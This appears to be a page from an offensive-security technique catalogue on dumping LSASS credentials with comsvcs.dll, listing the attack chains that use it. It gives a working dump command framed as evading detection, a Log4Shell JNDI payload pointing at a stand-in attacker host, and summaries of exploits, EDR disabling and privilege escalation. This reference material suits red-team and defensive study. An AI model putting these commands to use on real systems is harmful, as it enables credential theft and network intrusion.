LSASS via procdump / comsvcs.dll
rundll32.exe C:\windows\system32\comsvcs.dll MiniDump <pid> dump.dmp full — dump LSASS without Mimikatz signature.
§ Where this technique fits
W-LSASS-PROCDUMP is catalogued under the Credential Access tactic of the offensive-security kill-chain. It appears in 9 approved dossiers in the registry, at step 4.8 on average.
§ Dossiers chaining this technique
- step 4 / 5
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- step 4 / 6
ProxyShell → SYSTEM on Exchange → DA
Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- step 4 / 6
ProxyLogon → webshell on Exchange → DA
Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- step 5 / 5
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- step 5 / 6
Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
- step 5 / 6
Jenkins /script Groovy console → RCE → AD
Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- step 5 / 5
UAC bypass → elevated admin on a workstation
Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.
- step 5 / 5
Service account → SYSTEM via named-pipe impersonation
Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.
- step 6 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
§ What commonly comes next
- 01 AdminSDHolder Abuse (seen 2×) · AD-ADMINSDHOLDER · Persistence
- 02 Pass the Hash (seen 2×) · T1550.002 · Lateral Movement
- 03 SMB/Windows Admin Shares (seen 1×) · T1021.002 · Lateral Movement